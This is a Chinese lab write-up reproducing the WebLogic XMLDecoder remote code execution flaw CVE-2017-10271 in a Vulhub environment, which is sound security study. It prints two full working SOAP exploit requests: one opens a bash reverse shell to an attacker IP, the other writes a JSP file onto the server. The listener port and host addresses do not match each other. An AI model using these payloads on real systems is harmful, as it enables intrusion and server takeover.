Vulhub漏洞CVE-2017-10271復現
簡介
WebLogic XMLDecoder反序列化漏洞
WebLogic WLS組件中存在CVE-2017-10271遠程代碼執行漏洞,可以構造請求對運行WebLogic中間件的主機進行攻擊。
原理:
主要由wls-wsat.war觸發該漏洞,觸發漏洞url如下: http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortType post數據包,通過構造構造SOAP(XML)格式的請求,在解析的過程中導致XMLDecoder反序列化漏洞。
XML :
可擴展標記語言,用來傳輸和存儲數據
XMLDecoder:
XMLDecoder用於將XMLEncoder創建的xml文檔內容反序列化為一個Java對象,其位於java.beans包下。
XMLEncoder:
XMLEncoder 類是 ObjectOutputStream 的互補替換,可用於生成 JavaBean 的文本表示形式,所使用方式與用 ObjectOutputStream 創建 Serializable 對象的二進制表示形式的方式相同。
受影響WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。
漏洞利用路徑:/wls-wsat/CoordinatorPortType
操作
前提:已安裝好docker容器,vulhub靶場
靶機(虛擬機):IP:192.168.73.131 攻擊機:win10、ip略
-
進入CVE-2017-10271漏洞目錄
cd vulhub-master/weblogic/CVE-2017-10271
-
啟動docker容器服務
service docker start -
使用docker編譯啟動漏洞環境
docker-compose up -d
-
查看容器狀態,發現開啟了7001端口
-
訪問端口,查看是否搭建成功。如下圖為成功搭建
-
訪問該路徑下的”/wls-wsat/CoordinatorPortType11“目錄,如下圖就說明存在漏洞
-
靶機漏洞環境搭建好了以后,攻擊機用端口8888開啟nc監聽
nc -l -p 8888
-
構建poc:(白嫖的大神的,自己現在寫不出來)
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.43.53:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 637 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/192.168.43.248/9999 0>&1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> -
使用bp向靶機發送poc,host主機地址就是靶機的地址,記得加上端口號。返回的是攻擊機的地址和攻擊機開啟監聽的端口。
-
發現監聽成功反彈shell,說明構建poc攻擊有效。
-
在之前的poc基礎之上繼續構建寫入shell,發送(一瓢,嫖到底)
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.43.53:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 639 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string> <void method="println"><string> <![CDATA[ <% out.print("test"); %> ]]> </string> </void> <void method="close"/> </object></java></java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
-
訪問shell,成功
http://192.168.73.131:7001/bea_wls_internal/test.jsp